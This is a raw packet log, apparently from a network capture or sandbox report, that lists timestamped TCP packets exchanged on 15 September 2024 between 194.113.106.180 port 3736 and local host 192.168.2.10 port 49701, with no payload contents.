Sep 15, 2024 15:02:27.481014967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481041908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481049061 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481054068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481066942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481106997 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.481121063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481161118 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.481389046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481878042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481898069 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481911898 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.481920004 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.481957912 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.482012033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.482023954 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.482034922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.482047081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.482053995 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.482079983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.503246069 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.503345966 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.503360033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.503397942 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.503434896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.503447056 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.503482103 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.503557920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.503568888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.503595114 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.503596067 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.503607988 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.503635883 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.507066965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.507124901 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.507127047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.507142067 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.507175922 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.507308960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.507323027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.507337093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.507348061 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.507360935 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.507392883 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.516386032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.516463041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.516474962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.516510963 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.516562939 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.516575098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.516587973 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.516601086 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.516606092 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.516619921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.516633034 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.516652107 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.525043011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.525167942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.525182962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.525213003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.525326967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.525342941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.525352955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.525363922 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.525367022 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.525373936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.525387049 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.525403023 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.528518915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.528553963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.528589010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.528597116 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.528691053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.528724909 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.528733969 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.528759956 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.528795004 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.528805017 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.533802032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.533835888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.533854008 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.533924103 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.533965111 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.533974886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534009933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534045935 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534054041 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.534079075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534117937 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.534118891 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534156084 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534188032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534194946 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.534221888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534255981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534262896 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.534290075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534324884 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.534331083 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.535067081 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.535100937 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.535103083 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.535155058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.535187006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.535187960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.535223961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.535257101 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.535264015 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.535294056 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.535321951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.535334110 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.536519051 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.536560059 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.536628962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.536664009 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.536699057 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.536761045 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.536794901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.536829948 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.536838055 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.536864042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.536905050 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.543685913 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.543740034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.543772936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.543787003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.543875933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.543885946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.543899059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.543914080 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.543939114 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.543946981 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.545691013 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.545722008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.545739889 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.545754910 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.545789003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.545799017 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.545820951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.545855045 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.545866013 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.545891047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.545923948 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.545928955 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.550838947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.550868988 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.550887108 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.550920963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.550956964 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.550971031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.551004887 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.551045895 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.551054955 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.551089048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.551120996 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.551124096 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.553662062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.553710938 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.553745985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.553776026 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.553808928 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.553821087 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.553843021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.553874969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.553884983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.553910017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.553942919 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.553951025 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.567775011 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.567819118 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.568563938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.568617105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.568773985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.568804979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.568849087 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.568856001 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.568888903 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.568921089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.568926096 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.568957090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.568989992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.568993092 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.572282076 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572330952 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.572349072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572385073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572417021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572423935 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.572449923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572482109 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572489023 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.572516918 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572552919 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.572797060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572849035 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572884083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572887897 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.572916031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572949886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.572957039 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.572983980 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.573019028 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.573045969 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.597150087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.597207069 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.597229958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.597239971 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.597275972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.597285986 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.597310066 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.597349882 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.597352982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.597362041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.597404957 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.598490953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.598587990 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.598620892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.598630905 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.598695040 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.598730087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.598756075 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.598764896 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.598800898 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.598803997 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.607208014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.607249975 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.607265949 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.607278109 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.607316017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.607316971 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.607327938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.607336998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.607347965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.607364893 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.607394934 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.615823030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.615833998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.615844965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.615875006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.615952015 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.615962982 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.615978003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.615988016 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.615989923 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.616012096 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.619259119 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.619270086 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.619280100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.619301081 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.619328022 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.619436979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.619447947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.619458914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.619468927 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.619488955 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.619507074 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.624269962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624279976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624321938 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.624407053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624460936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624471903 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624499083 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.624521017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624557972 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.624591112 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624602079 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624613047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624636889 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.624855042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624893904 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.624962091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624973059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.624983072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.625009060 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.625298977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.625339985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.625344992 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.625500917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.625539064 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.625554085 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.625659943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.625696898 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.625888109 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.626597881 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.626642942 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.626645088 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.626710892 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.626754045 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.626787901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.626837969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.626872063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.626880884 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.626904964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.626940966 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.626966953 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.629848003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.629898071 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.629901886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.629936934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.629970074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.629976034 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.630021095 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.630054951 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.630059958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.630091906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.630136967 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.634339094 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.634372950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.634413004 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.634427071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.634480953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.634516001 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.634546995 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.634551048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.634596109 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.634603977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.636365891 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.636399031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.636413097 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.636434078 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.636473894 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.636486053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.636519909 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.636553049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.636559010 CEST	49701	3736	192.168.2.10	194.113.106.180
